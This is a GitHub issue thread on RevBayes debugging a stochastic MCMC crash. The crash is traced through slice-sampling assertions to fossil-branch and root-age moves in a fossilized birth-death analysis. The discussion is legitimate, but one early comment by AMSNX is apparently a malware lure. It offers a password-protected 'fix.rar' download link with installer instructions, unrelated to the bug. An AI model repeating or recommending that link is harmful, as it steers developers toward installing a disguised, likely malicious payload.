### ISSUE TITLE
[BUG] Crash due to -inf log likelihoods in `mvCollapseExpandFossilBranch`

### ISSUE THREAD

**Issue by davidcerny** [revbayes/revbayes#544]
**Describe the bug**
I'm running a fairly large FBD analysis (152 taxa, 931 characters) that sometimes causes RevBayes to crash. This is the stack trace I'm getting from lldb:

```
* thread #1, queue = 'com.apple.main-thread', stop reason = hit program assert
    frame #0: 0x0000000187332a60 libsystem_kernel.dylib`__pthread_kill + 8
    frame #1: 0x000000018736ac20 libsystem_pthread.dylib`pthread_kill + 288
    frame #2: 0x0000000187277a30 libsystem_c.dylib`abort + 180
    frame #3: 0x0000000187276d20 libsystem_c.dylib`__assert_rtn + 284
  * frame #4: 0x000000010110cca8 rb`search_interval(double, double&, double&, (anonymous namespace)::slice_function&, double) + 96
    frame #5: 0x000000010110bbf8 rb`slice_sample_doubling(double, (anonymous namespace)::slice_function&, double, int) + 212
    frame #6: 0x000000010110b940 rb`RevBayesCore::SliceSamplingMove::performMcmcMove(double, double, double) + 172
    frame #7: 0x0000000101110b14 rb`RevBayesCore::AbstractMove::performMcmcStep(double, double, double) + 80
    frame #8: 0x00000001011e29d8 rb`RevBayesCore::Mcmc::nextCycle(bool) + 152
    frame #9: 0x000000010119ea4c rb`RevBayesCore::MonteCarloAnalysis::run(unsigned long, RevBayesCore::RbVector<RevBayesCore::StoppingRule>, unsigned long, boost::filesystem::path const&, unsigned long, bool) + 2876
    frame #10: 0x000000010019ed98 rb`RevLanguage::MonteCarloAnalysis::executeMethod(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>> const&, std::__1::vector<RevLanguage::Argument, std::__1::allocator<RevLanguage::Argument>> const&, bool&) + 2028
    frame #11: 0x0000000100da7b20 rb`RevLanguage::MemberProcedure::execute() + 144
    frame #12: 0x0000000100c59a70 rb`RevLanguage::SyntaxFunctionCall::evaluateContent(RevLanguage::Environment&, bool) + 2192
    frame #13: 0x0000000100c704b4 rb`RevLanguage::Parser::execute(RevLanguage::SyntaxElement*, RevLanguage::Environment&) const + 96
    frame #14: 0x0000000100c5c784 rb`yyparse() + 1948
    frame #15: 0x0000000100c71808 rb`RevLanguage::Parser::processCommand(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>&, RevLanguage::Environment*) + 584
    frame #16: 0x0000000100d33f58 rb`RevLanguage::Func_source::execute() + 832
    frame #17: 0x0000000100c59a70 rb`RevLanguage::SyntaxFunctionCall::evaluateContent(RevLanguage::Environment&, bool) + 2192
    frame #18: 0x0000000100c704b4 rb`RevLanguage::Parser::execute(RevLanguage::SyntaxElement*, RevLanguage::Environment&) const + 96
    frame #19: 0x0000000100c5c784 rb`yyparse() + 1948
    frame #20: 0x0000000100c71808 rb`RevLanguage::Parser::processCommand(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>&, RevLanguage::Environment*) + 584
    frame #21: 0x0000000100c7394c rb`RevLanguageMain::startRevLanguageEnvironment(std::__1::vector<std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>, std::__1::allocator<std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>>> const&, std::__1::vector<std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>, std::__1::allocator<std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char>>>> const&) + 1736
    frame #22: 0x0000000100004d7c rb`main + 2968
    frame #23: 0x0000000186fe20e0 dyld`start + 2360
```

Further experimentation shows that the specific assertion that's failing in `search_interval` is `g(x0) >= logy`. (Maybe the others fail too, but this one gets triggered first.)

Some observations:

- The issue is stochastic; the crash occurs with some random seeds but not others.
- It seems to take place when the analysis dips into a particularly bad region of tree space. It never occurs when a good starting tree is provided, and when it does occur, it's usually within the first ~90 minutes of the analysis. If the crash hasn't taken place by then, chances are it won't take place at all, presumably because the analysis has started sampling from a higher-probability region.
- I can't reproduce the issue with `DEBUG_MCMC`, which gives me different likelihoods with the same seed. Using the script below, the crash occurs between iterations 130,000 and 140,000, but when `DEBUG_MCMC` is enabled, the analysis will complete 1 million iterations without a crash.
- I'm not sure the move is the real source of the problem (see also #293, which also seemed to come from `mvSlice` but turned out to be completely unrelated). The script only uses `mvSlice` to update the shape parameter of the gamma ASRV distribution. If it was this parameter that was problematic, it shouldn't be possible to circumvent the problem by setting a user-specified starting tree...

**To reproduce**
Run the Rev script from [this ZIP archive](https://github.com/user-attachments/files/16754900/fbd_mvslice_crash.zip). One absolute path has to be changed.

**Expected behavior**
No crash should occur.

**Computer info**
macOS 14.5 (Sonoma), ARM64 architecture, RevBayes 1.2.5-preview, latest version of the `development` branch (7d37172).

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by bredelings** [comment]
That assertion is testing that `likelihood(current value of x) >= current_likelihood() * uniform(0,1)`.  This means that the likelihood got _smaller_ when setting the variable `x` to its _current_ value.  So there is a bug somewhere else where the likelihood was not updated properly when the parameter changed.  If you try enough seeds, I suspect you can catch this problem with `DEBUG_MCMC`.

One question though:  does the problem go away if you change the `search_method` parameter to `mvSlice` to `"stepping_out"`?

**Comment by bredelings** [comment]
Perhaps I should add a comment to this assertion indicating what it means when the assertion fails.  Specifically, that the likelihood or prior was not incorrectly updated when a parameter changed, prior to the slice move.

**Comment by davidcerny** [comment]
> One question though: does the problem go away if you change the `search_method` parameter to `mvSlice` to `"stepping_out"`?

It does, but a new one emerges in its place – now the analysis crashes with this error instead:

```
Assertion failed: (std::abs(diff) < 1.0e-9), function slice_sample_stepping_out, file SliceSamplingMove.cpp, line 414.
zsh: abort      ./rb
```

I'll keep experimenting with random seeds to see if I can get something useful out of `MCMC_DEBUG`...

**Comment by davidcerny** [comment]
Hmm... so enabling `MCMC_DEBUG` did indeed help identify the real source of the problem, which has to do with `mvCollapseExpandFossilBranch`:

```
   Error:	Issue in 'CollapseExpandFossilBranch' on 'fbd_tree' after move because posterior of -24721.6 and -inf/-inf. The move was rejected.
   Error:	Problem processing line 251 in file ""/Users/David/Downloads/fbd_mvslice_crash/test.Rev""
```

```
   Error:	Issue in 'CollapseExpandFossilBranch' on 'fbd_tree' after move because posterior of -25701.2 and -inf/-inf. The move was rejected.
   Error:	Problem processing line 251 in file ""/Users/David/Downloads/fbd_mvslice_crash/test.Rev""
```

```
   Error:	Issue in 'CollapseExpandFossilBranch' on 'fbd_tree' after move because posterior of -26347.6 and -inf/-inf. The move was rejected.
   Error:	Problem processing line 251 in file ""/Users/David/Downloads/fbd_mvslice_crash/test.Rev""
```

**Comment by bjoelle** [comment]
@davidcerny I can't reproduce the issue with your script and `DEBUG_MCMC` enabled - it goes to 145 000 iterations without triggering the error

for the question regarding `mvSlice` - my guess is that the usual MH moves commonly use `-Inf` as a signal for "move impossible" or "move failed" (and FBD moves in particular seems to have few error / common-sense checks (see previous issues :/)) so it's not treated as an anomaly, whereas `mvSlice` is never supposed to use `-Inf` so it acts as a canary for invalid states

**Comment by davidcerny** [comment]
Apologies, it can indeed take a while for the error to pop up... after setting `seed(234)` and enabling `DEBUG_MCMC`, I get it between iterations 150,000 and 160,000.

And that makes a lot of sense about the dearth of sanity checks in tip-dating moves... hopefully we can work out these kinks over time.

**Comment by bjoelle** [comment]
seems to be the same issue as #557 but with `NodeTimeSlideBetaProposal` instead

**Comment by bjoelle** [comment]
ok so following the changes in PR #559 this still fails
it looks like this is because the root age has a separate move on it - so when it is being modified and the root is an SA, it tries to update the node age as well and then that fails

I'm not sure what is the best solution for this honestly, because the root age move has no reference to the tree so it cannot check for SAs - I think having a separate move on the root age may just be a bad idea ? since the root age is not a separate parameter in that case, but simply an additional clade constraint - and we do not put moves on the clade constraints
but then we would need some way to prevent that setup, because right now it's perfectly legal as a Rev script

**Comment by davidcerny** [comment]
Thank you for getting down to the bottom of this! (By the way, I'd be really curious to learn how you diagnosed the source of the problem, just so that I can use the same methods in the future!)

Some thoughts:

(1) Interestingly, the script actually contains _two_ root age moves (an oversight on my part): `mvSlide(root_age)` and `mvRootTimeSlideUniform(fbd_tree, root_age)`. The latter does take the tree as an argument, so we could implement a warning similar to the one you included in #440 ("don't use this move if the distribution that the tree was drawn from allows sampled ancestors"). But I don't see what we can do about the former. The fundamental issue is that `mvSlide(root_age)` actually operates on the starting age of the BDST process, and this age merely happens to coincide with the root (because we require that the process start with 2 lineages rather than 1).

(2) This makes me go back to the idea that in #559, `TopologyNode::setAge()` maybe shouldn't throw an exception when it is given an illegal age. What if we did something like this instead?

```cpp
if (a < getTaxon().getMinAge() || a > getTaxon().getMaxAge()) {
    age = RbConstants::Double::nan;
}
```

My hope here is that a tree with a node age equal to `nan` would yield a likelihood that is also equal to `nan`, which the sampler could recover from. But there's a good chance I'm getting this wrong...

**Comment by bredelings** [comment]
Being outside the age bounds does seem like it should simply yield a zero likelihood.  As I see it, the age bound are really a pseudolikelihood for secret data that has zero probability 0 if the taxon age is outside the bounds.

Ideally there would be a way to impose that probability from outside as pseudodata.  However, can we simply put that probability into the tree probability?

**Comment by bjoelle** [comment]
@davidcerny I think the problem is that the process age is treated as a stochastic node in both setups, but that's only really true when it is the origin - when it is the root then it should be more like a deterministic node based on the tree (or vice-versa, point is, they're not independent). Which is probably why the `mvRootTimeSlideUniform` move exists in the first place... But as you found out, RevBayes doesn't have very good tools to enforce that certain moves should not be used with certain parameters.
in response to (2) - my worry is that this is sort of "enabling" bad coding, where you don't think too hard about what is going on in your move and trust that the inference will _somehow_ catch it later if you do something illegal => which is exactly what got us into this series of bugs in the first place !
 
I guess one way to solve the issue would be to remove the root age as an independent parameter completely and tell people to use a clade constraint if they want a prior on the root age ? (this is what BEAST2 does, and it doesn't seem to confuse users)
another similar way would be to assume that if no age distribution is given for a fossil sample, then implicitly there is a point distribution associated with it - which would go along the lines of what @bredelings is suggesting I believe. The problem with that is it either requires investigating the graph somehow to detect these "non-constrained" samples, or it will be sensitive to user mistakes in the setup

**Comment by davidcerny** [comment]
Hmm, it's not obvious to me that treating a move as valid but rejecting it because it yields an `-Inf` log likelihood is a worse coding practice than treating it as invalid and throwing an exception. If we expect the inference to catch the problem and it doesn't, then maybe something's wrong with the inference (i.e., the likelihood evaluation step).

I could probably live with root age priors being specified via clade constraints, although it would break some of my published scripts. The bigger issue here is that a root age prior specified in this way presumably wouldn't replace the origin age prior; one would still have to specify the latter too. I can't think of many instances in paleontology (can't speak for epidemiology) where it would make sense to use both, rather than the root age prior alone (as allowed in the current setup).

> another similar way would be to assume that if no age distribution is given for a fossil sample, then implicitly there is a point distribution associated with it - which would go along the lines of what @bredelings is suggesting I believe.

I'm not sure I understand – doesn't the current problem stem from the fact that an age distribution is given, and sometimes violated?

**Comment by bjoelle** [comment]
sure, but you assumes that illegal moves are guaranteed to be rejected, which as we've seen is not always the case :) ultimately I don't have strong opinions, I just feel like it's clearer and more rigorous to express "this should not happen" as an exception rather than -Inf, which can mean anything and everything and is a pain to troubleshoot

so my idea when switching to a root clade constraint would be to make the origin age an optional argument, so just like now you would run with a root age or an origin age (or with both if you want, although that setup may not make much sense)

my understanding of @bredelings comments is that we could also solve this issue by allowing fossil ages to be updated, then if the age distribution exists and is violated then the move will be rejected - but that creates an issue if fossil ages are fixed, because then there is no distribution to catch invalid states

**Comment by bredelings** [comment]
> my understanding of @bredelings comments is that we could also solve this issue by allowing fossil ages to be updated, then if the age distribution exists and is violated then the move will be rejected - but that creates an issue if fossil ages are fixed, because then there is no distribution to catch invalid states

Interesting point.  I guess right now we if there is no min/max we just refuse to move tips?  In theory we could set min=max, and then return -Inf if the age doesn't match them.  But that isn't a serious proposal.  In revbayes I think what you are supposed to do when things are fixed is to clamp them -- but I don't think we can clamp tip ages.  It seems that current practice is to just not create a move for tips when they are supposed to be fixed, which is fragile.  We probably need to write a document describing current practice and some proposals for how to improve it.

In practice, we could make a move that sets the root age _catch_ the exception that is thrown.  An exception signals an error, but it doesn't have to terminate the MCMC run.  I agree with @davidcerny that tip ages not matching observations isn't really "invalid" _per se".  It would be nice if there was a more general framework to impose  constraints on tip ages -- for example, instead of just a "(min,max)" pair, soft bounds would be nice.  But we don't have that yet.

**Comment by davidcerny** [comment]
(1) So my idea with setting the node age to `nan` turned out to be unworkable (it causes RB to crash, which is even worse than terminating with an exception). On the other hand, the solution implemented by @bjoelle – refuse to set the age and emit a warning – seems to work perfectly, even without any further changes.

(2) My impression was that mixing fixed ages with age distributions wasn't problematic – in my proposed solution to #477, I did it as follows:

```
# accommodate fossil age uncertainty
fossils = fbd_tree.getFossils()

# remove those fossils that have no age uncertainty associated with them (i.e., min_age = max_age)
fossils.erase( taxon("Kyromyrma_neffi") )
fossils.erase( taxon("Protoscolia_normalis") )
fossils.erase( taxon("Undescribed_Dolichoderinae") )
fossils.erase( taxon("Undescribed_Ponerinae") )

for(i in 1:fossils.size())
{
    t[i] := tmrca(fbd_tree, clade(fossils[i]))

    a[i] = fossils[i].getMinAge()
    b[i] = fossils[i].getMaxAge()

    F[i] ~ dnUniform(t[i] - b[i], t[i] - a[i])
    F[i].clamp( 0 )
}
```

I thought the resulting behavior already was what you described, i.e., that the four "erased" fossils implicitly had point mass priors placed on their ages. Is that actually not the case? Do we expect there to be cases where their ages might get moved?

(3) @bredelings:

> It would be nice if there was a more general framework to impose constraints on tip ages -- for example, instead of just a "(min,max)" pair, soft bounds would be nice.

Now I'm wondering _why_ that isn't possible, and what the `F[i]` variable in the code above actually represents. Is it a log likelihood? Equal to 0 if we are between the bounds, and to -Inf everywhere else? The tutorial isn't clear on this...

**Comment by bjoelle** [comment]
@davidcerny I may be wrong, but I don't think there is _any_ distribution set on the fixed fossil ages in the script you've shown (where would that distribution come from ?)
now the `Taxon` object for those fossils will have min and max set to the fixed age, but that will not save you unless you actively check these before changing the age
I wouldn't expect that there would be _valid_ cases where the fixed fossil ages have to be changed during an MCMC, but `setAge` is also used for initialization and loading trees, which is why the exception I proposed can only check the age range in cases where `min < max` (i.e. the tip age is _not_ fixed) - using the exception in all cases broke a bunch of tests

overall this is why I strongly believe it is the responsibility of the proposals to check that what they are doing is valid - the tree has no way to know which phase of an MCMC it is in (or if it is even in one) so it is necessarily limited in what it can check

**Comment by bjoelle** [comment]
for (3) my understanding is that `F[i]` plays the role of an indicator variable - `p(F[i]) = 0` if the configuration is invalid with the specified age range, and `p(F[i]) != 0` otherwise
it's a bit complicated because the age of a clade/tip is a deterministic node and RB cannot set distributions on these, so instead we use the age to create a distribution that will be always centered on 0 if the age is valid, and then set the indicator to 0
in theory you could probably do this with a non-uniform distribution as well, I'm guessing nobody has tried because (1) the setup is already hard to understand with uniform and (2) empirical fossil ages will generally have hard bounds anyway

**Comment by davidcerny** [comment]
> now the `Taxon` object for those fossils will have min and max set to the fixed age, but that will not save you unless you actively check these before changing the age

Ah, that explains a lot... I did hope that would (automatically) save me. 🥲 Thank you for explaining this so clearly!

It's also interesting that the current approach to setting up tip age priors might generalize to non-uniform distributions as long as they are hard-bounded, since the notion of centering them on 0 wouldn't make sense otherwise. I guess that could work for something like a truncated exponential, or the weird PERT thing that PyRate does...

**Comment by davidcerny** [comment]
Fixed by #559.
